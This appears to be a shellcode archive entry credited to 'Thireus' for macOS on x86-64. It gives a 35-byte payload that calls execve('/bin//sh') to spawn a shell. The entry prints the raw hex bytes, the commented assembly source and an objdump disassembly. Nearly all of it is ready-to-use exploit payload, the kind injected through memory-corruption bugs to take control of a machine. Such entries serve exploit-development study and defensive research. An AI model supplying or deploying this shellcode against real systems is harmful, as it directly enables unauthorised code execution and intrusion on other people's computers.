execve("/bin//sh", ["/bin//sh"], NULL)

Shellcode – Details

System call(s):	execve(“/bin//sh”, [“/bin//sh”], NULL)
Size (char):	35
Shellcode:	`\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68`

Architecture

CPU maker:	Intel
Architecture:	x86-64
OS details:	MacOS
CPU details:	x86_64

------ .globl start

1:      xor     %rdx,       %rdx    # rdx = 0
 
        mov $0x1fffff6, %rax    # 0x200003b - 0x45 = 0x1FFFFF6
        add $0x45,      %rax    # System call number 59 for execve
 
        pop     %rdi            # pop ret address of "/bin//sh" in rdi
 
        push    %rdx            # push null
        push    %rdi            # push address of "/bin//sh"
        mov %rsp,       %rsi    # rsi = pointer to stack
 
        syscall             # System call
 
start:  call 1b             # Call 1 backward, ret address will be "/bin//sh"
        .ascii "/bin//sh"       # Equivalent to /bin/sh

file format mach-o-x86-64
 
Disassembly of section .text:
 
0000000000001fdd :
    1fdd:   48 31 d2                xor    %rdx,%rdx
    1fe0:   48 c7 c0 f6 ff ff 01    mov    $0x1fffff6,%rax
    1fe7:   48 83 c0 45             add    $0x45,%rax
    1feb:   5f                      pop    %rdi
    1fec:   52                      push   %rdx
    1fed:   57                      push   %rdi
    1fee:   48 89 e6                mov    %rsp,%rsi
    1ff1:   0f 05                   syscall 
 
0000000000001ff3 :
    1ff3:   e8 e5 ff ff ff          callq  1fdd
    1ff8:   2f                      (bad)
    1ff9:   62                      (bad)
    1ffa:   69                      .byte 0x69
    1ffb:   6e                      outsb  %ds:(%rsi),(%dx)
    1ffc:   2f                      (bad)
    1ffd:   2f                      (bad)
    1ffe:   73 68                   jae    2068

execve("/bin//sh", ["/bin//sh"], NULL) - MacOS mach-o-x86-64

Related terms:

Thireus

Related terms:

You might also like...